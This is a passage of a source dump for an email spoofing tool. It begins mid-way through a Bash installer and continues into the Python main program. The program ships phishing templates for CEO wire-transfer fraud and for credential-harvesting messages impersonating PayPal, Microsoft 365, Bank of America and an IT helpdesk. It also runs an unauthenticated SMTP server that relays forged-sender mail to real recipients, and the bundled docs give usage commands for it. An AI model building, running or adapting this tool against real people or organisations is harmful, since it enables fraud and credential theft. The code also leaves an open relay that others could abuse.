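    exit 1
fi

# Check if main script exists
if [ ! -f "\$MAIN_SCRIPT" ]; then
    echo "❌ EST installation not found at \$INSTALL_DIR"
    echo "💡 Try reinstalling: ./install.sh"
    exit 1
fi

# Activate virtual environment and execute
source "\$VENV_DIR/bin/activate"
exec python3 "\$MAIN_SCRIPT" "\$@"
EOF
    else
        # Create wrapper for system Python
        cat > "$INSTALL_DIR/bin/est" << EOF
#!/bin/bash
#
# EST - Email Spoofing Tool Wrapper Script (System Python)
# This script provides a clean interface to the EST tool
#

INSTALL_DIR="$INSTALL_DIR"
MAIN_SCRIPT="\$INSTALL_DIR/bin/est.py"

# Check if main script exists
if [ ! -f "\$MAIN_SCRIPT" ]; then
    echo "❌ EST installation not found at \$INSTALL_DIR"
    echo "💡 Try reinstalling: ./install.sh"
    exit 1
fi

# Add install directory to Python path.
# The separator is appended only when PYTHONPATH already has a value: a bare
# trailing ':' leaves an empty entry, which Python may treat as the current
# working directory and import modules from wherever the command is run.
export PYTHONPATH="\$INSTALL_DIR/lib\${PYTHONPATH:+:\$PYTHONPATH}"

# Execute main script with all arguments
exec python3 "\$MAIN_SCRIPT" "\$@"
EOF
    fi

    chmod +x "$INSTALL_DIR/bin/est"
    print_status "Created wrapper script for $PYTHON_ENV environment"
}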
422 |
423 | # Create desktop entry for GUI environments
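create_desktop_entry() {
    # Write a per-user .desktop launcher and, when $DESKTOP_DIR is writable
    # (directly or through sudo), copy it there as well.
    #
    # Reads: HOME, DESKTOP_DIR
    # Sets:  DESKTOP_FILE (global)
    print_step "Creating desktop integration..."

    # Create desktop entry
    DESKTOP_FILE="$HOME/.local/share/applications/est.desktop"
    mkdir -p "$(dirname "$DESKTOP_FILE")"

    cat > "$DESKTOP_FILE" << EOF
[Desktop Entry]
Name=EST - Email Spoofing Tool
Comment=Professional Email Security Assessment Framework
GenericName=Security Testing Tool
Exec=gnome-terminal --title="EST - Email Spoofing Tool" -- est
Icon=security-high
Terminal=true
Type=Application
Categories=Security;Network;Development;
Keywords=email;security;testing;penetration;spoofing;assessment;
StartupNotify=true
EOF

    # Create system-wide desktop entry (if possible).
    # The system-wide message is printed only when the copy succeeded; before,
    # a failed `sudo cp` was masked by `|| true` and still reported as created.
    if { [ -w "$DESKTOP_DIR" ] || sudo [ -w "$DESKTOP_DIR" ] 2>/dev/null; } &&
        sudo cp "$DESKTOP_FILE" "$DESKTOP_DIR/" 2>/dev/null; then
        print_status "Created desktop entry"
    else
        print_status "Created user desktop entry"
    fi

    print_status "Desktop integration completed"
}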
455 |
456 | # Create comprehensive documentation
create_documentation() {
    # Write QUICKSTART.md and TROUBLESHOOTING.md into $INSTALL_DIR/docs.
    #
    # Both heredocs use a quoted delimiter ('EOF'), so nothing inside them is
    # expanded: paths such as /opt/est and ~/.est-env are written literally and
    # do not follow $INSTALL_DIR or $VENV_DIR.
    #
    # Reads: INSTALL_DIR
    # Sets:  DOC_DIR (global)
    print_step "Creating documentation..."

    DOC_DIR="$INSTALL_DIR/docs"

    # Create quick start guide
    # NOTE(review): the guide suggests `sudo est server --port 25`, while
    # setup_directories leaves the install tree owned by the invoking user, so
    # that command runs a user-writable script as root. Prefer the
    # unprivileged port the guide already recommends.
    cat > "$DOC_DIR/QUICKSTART.md" << 'EOF'
# EST Quick Start Guide

## Basic Commands

### Start SMTP Server
```bash
# Start on unprivileged port (recommended)
est server --port 2525

# Start on standard SMTP port (requires sudo)
sudo est server --port 25
```

### List Attack Scenarios
```bash
est list
```

### Run Security Test
```bash
# Execute predefined scenario
est test 1 target@company.com

# Custom spoofing test
est custom --from-email "ceo@company.com" \
--from-name "John Smith" \
--subject "Urgent Request" \
--body "Please handle this immediately" \
--target "employee@company.com"
```

### Monitor and Report
```bash
# View test logs
est logs --lines 50

# Generate assessment report
est report
```

## Configuration

- Config file: `~/.est/config.json`
- Log files: `~/.est/est_tests.log`
- Reports: `~/.est/reports/`

## Troubleshooting

If you encounter Python environment issues:

### Virtual Environment Issues
```bash
# Check if virtual environment is active
echo $VIRTUAL_ENV

# Manually activate if needed
source ~/.est-env/bin/activate

# Reinstall if corrupted
rm -rf ~/.est-env
./install.sh
```

### System Python Issues
```bash
# Install missing dependencies
sudo apt install python3-dnspython

# Use system override if needed
pip3 install --user --break-system-packages dnspython
```

## Support

- Documentation: /opt/est/docs/
- Examples: /opt/est/examples/
- Issues: https://github.com/your-org/EST/issues
EOF

    # Create troubleshooting guide
    cat > "$DOC_DIR/TROUBLESHOOTING.md" << 'EOF'
# EST Troubleshooting Guide

## Python Environment Issues

### Virtual Environment Not Found
**Problem**: EST can't find virtual environment
**Solution**:
```bash
# Reinstall EST
./install.sh

# Or manually recreate
python3 -m venv ~/.est-env
source ~/.est-env/bin/activate
pip install dnspython
```

### Externally Managed Environment Error
**Problem**: pip install fails with "externally-managed-environment"
**Solution**:
```bash
# Option 1: Use virtual environment (recommended)
python3 -m venv ~/.est-env
source ~/.est-env/bin/activate
pip install dnspython

# Option 2: Use system packages
sudo apt install python3-dnspython

# Option 3: Override (use with caution)
pip3 install --user --break-system-packages dnspython
```

## Common Issues

### Port Permission Denied
**Problem**: Cannot bind to port 25
**Solution**:
```bash
# Use unprivileged port
est server --port 2525

# OR run as root for port 25
sudo est server --port 25
```

### DNS Resolution Failures
**Problem**: Cannot resolve MX records
**Solution**:
```bash
# Install DNS library
sudo apt install python3-dnspython

# Verify DNS functionality
dig MX example.com
```

### Email Delivery Failures
**Problem**: Emails not reaching targets
**Solution**:
1. Check SMTP server logs: `est logs`
2. Verify target domain: `dig MX target-domain.com`
3. Test with temporary email: `est test 1 test@guerrillamail.com`

### Command Not Found
**Problem**: `est` command not available
**Solution**:
```bash
# Reinstall tool
./install.sh

# Or run directly
python3 /opt/est/bin/est.py --help

# Check if virtual environment is needed
source ~/.est-env/bin/activate
est --help
```

### Module Import Errors
**Problem**: Missing Python modules
**Solution**:
```bash
# For virtual environment
source ~/.est-env/bin/activate
pip install dnspython

# For system installation
sudo apt install python3-dnspython

# Check Python path
python3 -c "import dns.resolver; print('DNS module working')"
```

## Kali Linux Specific

### Python 3.13+ Issues
Kali Linux uses Python 3.13+ which has stricter package management:

```bash
# Always use virtual environment on Kali
python3 -m venv ~/.est-env
source ~/.est-env/bin/activate
pip install dnspython

# Or use system packages
sudo apt install python3-dnspython
```

### Network Interface Issues
```bash
# Bind to specific interface
est server --host 192.168.1.100 --port 2525

# Check network interfaces
ip addr show
```
EOF

    print_status "Documentation created"
}
666 |
667 | # Install bash completion
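install_bash_completion() {
    # Install a bash completion script for `est` into /etc/bash_completion.d.
    #
    # The script is staged in a private mktemp file and installed with root
    # ownership and mode 0644. Staging at a fixed, predictable /tmp name would
    # let another local user pre-create or swap that file before it is moved,
    # with elevated rights, into a directory that shells source on start-up.
    #
    # Sets: COMPLETION_DIR, COMPLETION_FILE (globals)
    print_step "Installing bash completion..."

    COMPLETION_DIR="/etc/bash_completion.d"
    COMPLETION_FILE="$COMPLETION_DIR/est"

    if [ ! -d "$COMPLETION_DIR" ]; then
        print_warning "Bash completion directory not found, skipping"
        return 0
    fi

    local staging
    if ! staging="$(mktemp)"; then
        print_warning "Could not install bash completion (permissions)"
        return 0
    fi

    # Quoted delimiter: the completion function is written out verbatim.
    cat > "$staging" << 'EOF'
# EST bash completion
_est_completion() {
    local cur prev commands
    COMPREPLY=()
    cur="${COMP_WORDS[COMP_CWORD]}"
    prev="${COMP_WORDS[COMP_CWORD-1]}"
    commands="server list test custom logs report"

    case ${prev} in
        est)
            COMPREPLY=( $(compgen -W "${commands}" -- "${cur}") )
            return 0
            ;;
        server)
            COMPREPLY=( $(compgen -W "--host --port" -- "${cur}") )
            return 0
            ;;
        test)
            COMPREPLY=( $(compgen -W "1 2 3 4 5" -- "${cur}") )
            return 0
            ;;
        logs)
            COMPREPLY=( $(compgen -W "--lines" -- "${cur}") )
            return 0
            ;;
        report)
            COMPREPLY=( $(compgen -W "--output" -- "${cur}") )
            return 0
            ;;
        custom)
            COMPREPLY=( $(compgen -W "--from-email --from-name --subject --body --target" -- "${cur}") )
            return 0
            ;;
    esac
}

complete -F _est_completion est
EOF

    # Numeric IDs for the root owner and group avoid depending on the name of
    # the root group on the host.
    if sudo install -o 0 -g 0 -m 0644 "$staging" "$COMPLETION_FILE" 2>/dev/null; then
        print_status "Bash completion installed"
    else
        print_warning "Could not install bash completion (permissions)"
    fi

    # The staging file no longer matches the /tmp/est_* glob used by cleanup,
    # so it is removed here.
    rm -f "$staging"
}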
724 |
725 | # Verify installation
verify_installation() {
    # Post-install smoke test. Returns 1 at the first failed mandatory check;
    # a failing `est list` only produces a warning.
    print_step "Verifying installation..."

    # The command must resolve through PATH.
    if ! command -v est &> /dev/null; then
        print_error "EST command not found in PATH"
        return 1
    fi
    print_status "EST command available system-wide"

    # --help must exit successfully.
    if ! est --help &> /dev/null; then
        print_error "EST help command failed"
        return 1
    fi
    print_status "EST help command functional"

    # The per-user configuration directory must exist.
    if [ ! -d "$HOME/.est" ]; then
        print_error "User configuration directory missing"
        return 1
    fi
    print_status "User configuration directory exists"

    # The virtual environment is only required when one was requested.
    if [ "$USE_VENV" = true ]; then
        if [ ! -d "$VENV_DIR" ]; then
            print_error "Virtual environment missing"
            return 1
        fi
        print_status "Virtual environment exists at $VENV_DIR"
    fi

    # Basic functionality is best-effort.
    if est list &> /dev/null; then
        print_status "EST basic functionality working"
    else
        print_warning "EST basic test failed (may work anyway)"
    fi

    print_status "Installation verification completed successfully"
}
772 |
773 | # Display post-installation information
show_post_install_info() {
    # Print the post-install summary: install locations, the Python
    # environment in use, example commands, documentation paths and the
    # authorized-use reminder. Output only; no state is changed.
    #
    # Reads: TOOL_VERSION, INSTALL_DIR, BIN_LINK, USE_VENV, VENV_DIR and the
    #        colour variables (GREEN, CYAN, BLUE, YELLOW, RED, PURPLE, NC).
    echo
    echo -e "${GREEN}╔══════════════════════════════════════════════════════════════╗${NC}"
    echo -e "${GREEN}║ INSTALLATION COMPLETE! ║${NC}"
    echo -e "${GREEN}╚══════════════════════════════════════════════════════════════╝${NC}"
    echo
    echo -e "${CYAN}🚀 EST v${TOOL_VERSION} successfully installed!${NC}"
    echo
    echo -e "${BLUE}📍 Installation Details:${NC}"
    echo -e " 📂 Installation Directory: ${INSTALL_DIR}"
    echo -e " 🔗 System Command: ${BIN_LINK}"
    echo -e " ⚙️ User Config: ~/.est/"
    echo -e " 📚 Documentation: ${INSTALL_DIR}/docs/"
    # The environment line mirrors the wrapper variant that was generated.
    if [ "$USE_VENV" = true ]; then
        echo -e " 🐍 Python Environment: Virtual environment at $VENV_DIR"
    else
        echo -e " 🐍 Python Environment: System Python"
    fi
    echo
    echo -e "${BLUE}🎯 Quick Start Commands:${NC}"
    echo -e "${YELLOW} est server --port 2525${NC} # Start SMTP server"
    echo -e "${YELLOW} est list${NC} # List attack scenarios"
    echo -e "${YELLOW} est test 1 target@email.com${NC} # Run CEO fraud test"
    echo -e "${YELLOW} est logs${NC} # View test logs"
    echo -e "${YELLOW} est --help${NC} # Show all options"
    echo
    echo -e "${BLUE}📖 Getting Started:${NC}"
    echo -e " 1. Start EST server: ${YELLOW}est server --port 2525${NC}"
    echo -e " 2. Get temp email from: ${YELLOW}https://guerrillamail.com${NC}"
    echo -e " 3. Run first test: ${YELLOW}est test 1 your-temp-email@guerrillamail.com${NC}"
    echo -e " 4. Check results: ${YELLOW}est logs${NC}"
    echo
    echo -e "${BLUE}📚 Documentation:${NC}"
    echo -e " • Quick Start: ${INSTALL_DIR}/docs/QUICKSTART.md"
    echo -e " • Troubleshooting: ${INSTALL_DIR}/docs/TROUBLESHOOTING.md"
    echo -e " • Full README: ${INSTALL_DIR}/docs/README.md"
    echo
    if [ "$USE_VENV" = true ]; then
        echo -e "${BLUE}🐍 Python Environment:${NC}"
        echo -e " • Virtual environment: ${VENV_DIR}"
        echo -e " • Isolated from system Python"
        echo -e " • Compatible with Python 3.13+"
        echo
    fi
    echo -e "${RED}⚠️ IMPORTANT LEGAL REMINDER:${NC}"
    echo -e "${RED} EST is for authorized security testing and education only!${NC}"
    echo -e "${RED} Always obtain explicit written permission before testing.${NC}"
    echo
    echo -e "${PURPLE}💡 Need help? Run: ${YELLOW}est --help${NC} ${PURPLE}or check the documentation${NC}"
    echo
}
825 |
826 | # Cleanup function
cleanup() {
    # EXIT handler: remove the installer's temporary files and leave any
    # active virtual environment.
    print_info "Cleaning up temporary files..."

    # NOTE(review): the glob matches every /tmp/est_* entry this user may
    # delete, not only files created by this run.
    rm -f /tmp/est_*

    # Deactivate virtual environment if active
    if [ -n "$VIRTUAL_ENV" ]; then
        deactivate 2> /dev/null || true
    fi
}

# Signal handlers
trap cleanup EXIT
839 |
840 | # Main installation process
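main() {
    # Installer entry point: show what will be installed, ask for
    # confirmation, run each installation step in order, then verify.
    # Exits 0 when the user declines and 1 when verification fails.
    print_banner

    echo -e "${YELLOW}⚠️ This will install EST (Email Spoofing Tool) system-wide${NC}"
    echo -e "${YELLOW} Installation directory: ${INSTALL_DIR}${NC}"
    echo -e "${YELLOW} System command: ${BIN_LINK}${NC}"
    if command -v python3 &> /dev/null; then
        PYTHON_VERSION=$(python3 -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
        # Compare the version as a tuple of integers inside Python. A string
        # comparison such as [[ "$PYTHON_VERSION" > "3.12" ]] is lexical and
        # ranks "3.9" above "3.12".
        if python3 -c 'import sys; sys.exit(0 if sys.version_info[:2] > (3, 12) else 1)'; then
            echo -e "${YELLOW} Python $PYTHON_VERSION detected - will use virtual environment${NC}"
        fi
    fi
    echo
    # -n 1: accept a single keypress; -r: keep backslashes literal.
    read -p "Continue with installation? (y/N): " -n 1 -r
    echo

    if [[ ! $REPLY =~ ^[Yy]$ ]]; then
        print_info "Installation cancelled by user"
        exit 0
    fi

    echo
    print_info "Starting EST installation process..."
    echo

    # Run installation steps
    check_root
    check_system
    echo

    install_dependencies
    echo

    setup_python_environment
    echo

    setup_directories
    echo

    install_tool
    echo

    create_desktop_entry
    echo

    create_documentation
    echo

    install_bash_completion
    echo

    if verify_installation; then
        echo
        show_post_install_info
    else
        print_error "Installation verification failed"
        echo "Please check the error messages above and retry installation"
        exit 1
    fi
}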
901 |
902 | # Check if required files exist
# The installer must be started from the directory that holds est.py.
[ -f "est.py" ] || {
    print_error "Required file 'est.py' not found in current directory"
    echo
    echo "Please ensure you have the following EST files:"
    echo " • est.py (main application)"
    echo " • install.sh (this installer)"
    echo " • README.md (documentation)"
    echo " • requirements.txt (dependencies)"
    echo
    echo "Download from: https://github.com/techsky-eh/EST"
    exit 1
}

# Hand over to the installer, forwarding the command-line arguments.
main "$@"
--------------------------------------------------------------------------------
/est.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | """
3 | EST - Email Spoofing Tool
4 | Professional Email Security Assessment Framework
5 |
6 | Author: Security Research Team
7 | Version: 2.0.1
8 | License: MIT
9 | Repository: https://github.com/your-org/EST
10 |
11 | LEGAL NOTICE:
12 | This tool is designed for authorized security testing, penetration testing,
13 | and educational purposes only. Users must obtain explicit written permission
14 | before testing any systems they do not own. Unauthorized use of this tool
15 | may violate local, state, and federal laws.
16 |
17 | The developers assume no liability and are not responsible for any misuse
18 | or damage caused by this program.
19 | """
20 |
21 | import sys
22 | import os
23 | import json
24 | import argparse
25 | import socket
26 | import threading
27 | import smtplib
28 | import time
29 | import subprocess
30 | import signal
31 | from datetime import datetime
32 | from pathlib import Path
33 | from typing import Dict, List, Optional, Tuple
34 | import logging
35 | from dataclasses import dataclass
36 | import re
37 | from email.mime.text import MIMEText
38 | from email.mime.multipart import MIMEMultipart
39 | from email.header import Header
40 | from email.utils import formatdate
41 | import email.utils
42 |
43 | # Version and metadata
44 | __version__ = "2.0.1"
45 | __author__ = "Tech Sky - SRT"
46 | __license__ = "MIT"
47 | __description__ = "Professional Email Security Assessment Framework"
48 |
@dataclass
class EmailScenario:
    """Data class for email spoofing scenarios.

    The field names match the keys of each entry under ``"scenarios"`` in the
    default configuration built by ``ESTConfig._load_config``.
    """
    name: str  # scenario title
    category: str  # grouping label for the scenario
    from_email: str  # sender address the scenario presents
    from_name: str  # display name paired with from_email
    subject: str  # message subject line
    body: str  # message body text
    description: str  # one-line summary of what the scenario imitates
    severity: str  # the default entries use "Critical", "High" and "Medium"
60 |
@dataclass
class TestResult:
    """Data class for test results.

    ``SMTPTestServer._process_email`` builds one instance per relayed message
    and passes it to ``_log_test_result``.
    """
    timestamp: str  # _process_email stores datetime.now().isoformat()
    test_type: str  # e.g. "smtp_relay"
    scenario: str  # e.g. "server_relay"
    target: str  # recipient addresses joined with ", "
    from_email: str  # sender address taken from MAIL FROM
    success: bool  # True when at least one recipient was delivered to
    details: Dict  # free-form extras (client id, counts, message size)
71 |
72 | class ESTConfig:
73 | """Configuration manager for EST"""
74 |
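    def __init__(self):
        """Resolve the per-user paths, create the directories and load state.

        Sets ``config_dir`` (``~/.est``), ``config_file``, ``log_file`` and
        ``reports_dir``, then loads the configuration into ``self.config`` and
        configures logging.
        """
        self.config_dir = Path.home() / ".est"
        self.config_file = self.config_dir / "config.json"
        self.log_file = self.config_dir / "est_tests.log"
        self.reports_dir = self.config_dir / "reports"

        # Create directories.
        # The test log written here records the sender and target addresses of
        # every test, so directories created by this call are private to the
        # owner. A directory that already exists keeps its current mode.
        self.config_dir.mkdir(mode=0o700, exist_ok=True)
        self.reports_dir.mkdir(mode=0o700, exist_ok=True)

        # Load configuration
        self.config = self._load_config()

        # Setup logging
        self._setup_logging()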
90 |
91 | def _load_config(self) -> Dict:
92 | """Load configuration from file"""
93 | default_config = {
94 | "version": __version__,
95 | "smtp_server": {
96 | "host": "0.0.0.0",
97 | "port": 2525,
98 | "timeout": 30
99 | },
100 | "scenarios": [
101 | {
102 | "name": "CEO Fraud - Urgent Wire Transfer",
103 | "category": "Business Email Compromise",
104 | "from_email": "ceo@targetcompany.com",
105 | "from_name": "John Smith, CEO",
106 | "subject": "URGENT: Wire Transfer Authorization Required",
107 | "body": "I need you to process an urgent wire transfer for $85,000 to our new vendor immediately. This is time-sensitive and confidential. Please handle this discreetly and confirm once completed.\n\nAmount: $85,000\nAccount details will be provided separately.\n\nRegards,\nJohn Smith\nChief Executive Officer",
108 | "description": "CEO impersonation requesting urgent financial transaction",
109 | "severity": "Critical"
110 | },
111 | {
112 | "name": "IT Helpdesk - Password Reset",
113 | "category": "Technical Support Fraud",
114 | "from_email": "helpdesk@targetcompany.com",
115 | "from_name": "IT Support Team",
116 | "subject": "Action Required: Password Reset Verification",
117 | "body": "Dear User,\n\nWe have detected suspicious activity on your account. For security purposes, you must verify your current password within 24 hours to prevent account suspension.\n\nClick here to verify: [VERIFICATION LINK]\n\nFailure to verify will result in immediate account lockout.\n\nIT Support Team\nDo not reply to this email.",
118 | "description": "IT support impersonation for credential harvesting",
119 | "severity": "High"
120 | },
121 | {
122 | "name": "PayPal Security Alert",
123 | "category": "Financial Services Phishing",
124 | "from_email": "security@paypal.com",
125 | "from_name": "PayPal Security Team",
126 | "subject": "Security Alert: Unusual Account Activity Detected",
127 | "body": "We've detected unusual activity on your PayPal account:\n\n• Login from new device (IP: 192.168.1.100)\n• Attempted transaction: $1,247.99\n• Location: Unknown\n\nYour account has been temporarily limited for your protection.\n\nVerify your account immediately: [SECURE LINK]\n\nIf you don't recognize this activity, please contact us immediately.\n\nPayPal Security Team\nThis is an automated message.",
128 | "description": "PayPal impersonation for account compromise",
129 | "severity": "High"
130 | },
131 | {
132 | "name": "Microsoft 365 License Expiration",
133 | "category": "Software/License Fraud",
134 | "from_email": "noreply@microsoft.com",
135 | "from_name": "Microsoft 365 Admin",
136 | "subject": "ACTION REQUIRED: Your Microsoft 365 License Expires Today",
137 | "body": "Your Microsoft 365 Business license expires today at 11:59 PM.\n\nImmediate action required to prevent:\n✗ Loss of email access\n✗ File synchronization stoppage\n✗ Team collaboration disruption\n\nRenew immediately to maintain access:\n[RENEWAL LINK]\n\nYour license key: M365-BIZ-2024-XXXX\n\nMicrosoft 365 Administration\nThis is an automated renewal notice.",
138 | "description": "Microsoft service impersonation for credential theft",
139 | "severity": "Medium"
140 | },
141 | {
142 | "name": "Bank Account Verification",
143 | "category": "Financial Institution Fraud",
144 | "from_email": "security@bankofamerica.com",
145 | "from_name": "Bank of America Security",
146 | "subject": "Immediate Verification Required - Account Suspension Notice",
147 | "body": "IMPORTANT SECURITY NOTICE\n\nWe have temporarily suspended your account due to suspicious activity:\n\n• Multiple failed login attempts\n• Unrecognized device access\n• Potential unauthorized transactions\n\nAccount Status: SUSPENDED\nSuspension Date: [TODAY]\nReference: SEC-2024-[RANDOM]\n\nVerify your identity immediately to restore access:\n[VERIFICATION PORTAL]\n\nFailure to verify within 48 hours will result in permanent closure.\n\nBank of America Security Department",
148 | "description": "Banking institution impersonation for credential harvesting",
149 | "severity": "Critical"
150 | }
151 | ],
152 | "temp_email_services": [
153 | "guerrillamail.com",
154 | "sharklasers.com",
155 | "mailinator.com",
156 | "10minutemail.com",
157 | "tempmail.org",
158 | "yopmail.com"
159 | ],
160 | "reporting": {
161 | "auto_generate": True,
162 | "format": "json",
163 | "include_screenshots": False
164 | }
165 | }
166 |
167 | if self.config_file.exists():
168 | try:
169 | with open(self.config_file, 'r') as f:
170 | loaded_config = json.load(f)
171 | # Merge with defaults to ensure all keys exist
172 | for key in default_config:
173 | if key not in loaded_config:
174 | loaded_config[key] = default_config[key]
175 | return loaded_config
176 | except Exception as e:
177 | print(f"⚠️ Error loading config: {e}")
178 | return default_config
179 | else:
180 | self._save_config(default_config)
181 | return default_config
182 |
    def _save_config(self, config: Dict):
        """Write *config* to ``self.config_file`` as two-space-indented JSON.

        Any failure is reported on stdout and otherwise ignored, so callers
        always get ``None`` back.
        """
        try:
            handle = open(self.config_file, 'w')
            with handle:
                json.dump(config, handle, indent=2)
        except Exception as err:
            print(f"⚠️ Error saving config: {err}")
190 |
    def _setup_logging(self):
        """Configure root logging and bind ``self.logger`` to the 'EST' logger.

        Records at INFO and above go to ``self.log_file`` and to stdout.
        """
        file_sink = logging.FileHandler(self.log_file)
        console_sink = logging.StreamHandler(sys.stdout)
        logging.basicConfig(
            level=logging.INFO,
            format='%(asctime)s - %(levelname)s - %(message)s',
            handlers=[file_sink, console_sink],
        )
        self.logger = logging.getLogger('EST')
202 |
203 | class SMTPTestServer:
204 | """Professional SMTP server for security testing"""
205 |
    def __init__(self, host: str, port: int, config: ESTConfig):
        """Store the bind address and configuration; no socket is opened here."""
        # Address that start() binds to.
        self.host, self.port = host, port
        # Shared configuration (paths and logger).
        self.config = config
        # Run flag and counters, updated by start() and the client handler.
        self.running = False
        self.connections = 0
        self.emails_processed = 0
213 |
    def start(self):
        """Start the SMTP testing server.

        Binds a TCP listener on ``self.host``/``self.port``, prints a status
        banner, installs a SIGINT handler and accepts connections until
        ``self.running`` is cleared, handing each connection to
        ``_handle_client`` on a daemon thread. The listening socket is closed
        on the way out, whatever the outcome.
        """
        try:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Allow an immediate restart on the same port.
            self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # NOTE(review): the default host in ESTConfig is "0.0.0.0" and
            # _handle_client accepts any MAIL FROM / RCPT TO without
            # authentication, so on a non-loopback bind every host that can
            # reach the port can use this listener as a relay. Bind to
            # 127.0.0.1 or firewall the port when testing.
            self.sock.bind((self.host, self.port))
            self.sock.listen(10)
            self.running = True

            # The counters in the banner are read once, at start-up.
            print(f"""
╔══════════════════════════════════════════════════════════════╗
║ EST SMTP SERVER v{__version__} ║
║ Email Spoofing Tool - Server Mode ║
╚══════════════════════════════════════════════════════════════╝

🚀 Server Status: ACTIVE
📡 Listening on: {self.host}:{self.port}
📁 Log file: {self.config.log_file}
📊 Statistics: {self.connections} connections, {self.emails_processed} emails processed

⚡ Server Features:
• Multi-threaded connection handling
• Automatic MX record resolution
• Real-time email relay to destinations
• Comprehensive audit logging
• Professional SMTP protocol compliance

🎯 Quick Test Commands:
telnet {self.host} {self.port}
est test 1 target@example.com

🛑 Press Ctrl+C to stop server
""")

            # Handle Ctrl+C gracefully
            signal.signal(signal.SIGINT, self._signal_handler)

            while self.running:
                try:
                    client_sock, addr = self.sock.accept()
                    self.connections += 1
                    # One thread per connection; no upper bound is applied.
                    thread = threading.Thread(
                        target=self._handle_client,
                        args=(client_sock, addr),
                        name=f"SMTP-Client-{self.connections}"
                    )
                    # Daemon threads do not keep the process alive at exit.
                    thread.daemon = True
                    thread.start()
                except Exception as e:
                    # Errors raised after running was cleared are not logged.
                    if self.running:
                        self.config.logger.error(f"Accept error: {e}")

        except Exception as e:
            print(f"❌ Server startup failed: {e}")
            # Hint shown for low port numbers, which usually need elevated
            # privileges to bind.
            if self.port <= 1024:
                print("💡 Try using a higher port number (e.g., --port 2525)")
        finally:
            # self.sock is missing when socket.socket() itself failed.
            if hasattr(self, 'sock'):
                self.sock.close()
273 |
    def _signal_handler(self, signum, frame):
        """Print the final counters, clear the run flag and exit with status 0.

        ``signum`` and ``frame`` are accepted for the signal-handler signature
        and not used.
        """
        closing_lines = (
            f"\n\n🛑 Shutting down EST SMTP Server...",
            f"📊 Final Statistics:",
            f" • Connections handled: {self.connections}",
            f" • Emails processed: {self.emails_processed}",
            f" • Log file: {self.config.log_file}",
        )
        for text in closing_lines:
            print(text)
        self.running = False
        sys.exit(0)
283 |
    def _handle_client(self, client_sock, addr):
        """Handle individual SMTP client connections.

        Sends the 220 greeting, then reads commands until the peer
        disconnects, sends QUIT, an error occurs or the server stops. Handles
        EHLO/HELO, MAIL FROM, RCPT TO, DATA, RSET and QUIT; anything else gets
        a 500 reply. The socket is always closed on exit.

        Args:
            client_sock: connected socket returned by ``accept()``.
            addr: peer ``(host, port)`` pair, used for replies and log lines.
        """
        client_id = f"{addr[0]}:{addr[1]}"

        try:
            self.config.logger.info(f"New SMTP connection from {client_id}")

            # SMTP session state
            mail_from = ""
            rcpt_to = []

            # Send greeting
            client_sock.send(f"220 EST-SMTP-{__version__} Security Testing Server Ready\r\n".encode())

            while self.running:
                try:
                    # NOTE(review): one recv() is treated as one command; no
                    # read timeout is set on the socket in this method, so the
                    # socket.timeout branch below only fires if one is
                    # configured elsewhere.
                    data = client_sock.recv(4096).decode('utf-8', errors='ignore').strip()
                    if not data:
                        break

                    # Log command
                    # NOTE(review): peer-controlled text is written to the log
                    # as-is; strip() trims only the ends, so line breaks inside
                    # the chunk can forge extra log lines.
                    self.config.logger.debug(f"[{client_id}] Command: {data}")

                    # Upper-cased copy for matching only; arguments are parsed
                    # from the original text.
                    cmd = data.upper()

                    if cmd.startswith("EHLO") or cmd.startswith("HELO"):
                        response = f"250-EST-SMTP Hello {addr[0]}\r\n250 HELP\r\n"
                        client_sock.send(response.encode())

                    elif cmd.startswith("MAIL FROM:"):
                        # Any sender is accepted; no authentication or policy
                        # check is applied.
                        mail_from = self._extract_email(data)
                        self.config.logger.info(f"[{client_id}] Spoofed sender: {mail_from}")
                        client_sock.send(b"250 OK\r\n")

                    elif cmd.startswith("RCPT TO:"):
                        # Any recipient is accepted and the list has no size
                        # limit.
                        rcpt = self._extract_email(data)
                        rcpt_to.append(rcpt)
                        self.config.logger.info(f"[{client_id}] Target: {rcpt}")
                        client_sock.send(b"250 OK\r\n")

                    elif cmd == "DATA":
                        client_sock.send(b"354 End data with .\r\n")

                        # Receive email data
                        # NOTE(review): the buffer grows without a size cap
                        # and the terminator is tested on each received chunk
                        # rather than on the accumulated text, so a peer can
                        # keep this loop, and the memory it holds, alive
                        # indefinitely.
                        email_data = ""
                        while True:
                            line = client_sock.recv(4096).decode('utf-8', errors='ignore')
                            email_data += line
                            if line.endswith('\r\n.\r\n'):
                                break

                        # Process email
                        # [:-5] drops the trailing "\r\n.\r\n" terminator.
                        success = self._process_email(mail_from, rcpt_to, email_data[:-5], client_id)
                        self.emails_processed += 1

                        if success:
                            client_sock.send(b"250 OK Message queued for delivery\r\n")
                        else:
                            client_sock.send(b"550 Message delivery failed\r\n")

                        # Reset session
                        mail_from = ""
                        rcpt_to = []

                    elif cmd == "QUIT":
                        client_sock.send(b"221 EST-SMTP closing connection\r\n")
                        break

                    elif cmd.startswith("RSET"):
                        mail_from = ""
                        rcpt_to = []
                        client_sock.send(b"250 OK\r\n")

                    else:
                        client_sock.send(b"500 Command not recognized\r\n")

                except socket.timeout:
                    break
                except Exception as e:
                    self.config.logger.error(f"[{client_id}] Command processing error: {e}")
                    break

        except Exception as e:
            self.config.logger.error(f"[{client_id}] Connection error: {e}")
        finally:
            client_sock.close()
            self.config.logger.info(f"[{client_id}] Connection closed")
371 |
    def _extract_email(self, smtp_line: str) -> str:
        """Return the address carried by a MAIL FROM / RCPT TO line.

        The first non-empty ``<...>`` group wins. Without one, the last
        whitespace-separated token is returned with surrounding angle brackets
        stripped, or ``""`` when the line has a single token or none.
        """
        bracketed = re.search(r'<(.+?)>', smtp_line)
        if bracketed is not None:
            return bracketed.group(1)

        tokens = smtp_line.split()
        if len(tokens) <= 1:
            return ""
        return tokens[-1].strip('<>')
379 |
    def _process_email(self, mail_from: str, rcpt_to: List[str], email_data: str, client_id: str) -> bool:
        """Relay one received message to each recipient and record the outcome.

        Every recipient is attempted through ``_relay_email``. One
        ``TestResult`` summarising the attempt is passed to
        ``_log_test_result``.

        Returns:
            True when at least one recipient was delivered to.
        """
        self.config.logger.info(f"[{client_id}] Processing spoofed email from {mail_from} to {rcpt_to}")

        # Count the recipients whose relay attempt succeeded.
        delivered = sum(
            1 for rcpt in rcpt_to if self._relay_email(mail_from, rcpt, email_data)
        )
        any_delivered = delivered > 0

        # Log test result
        summary = {
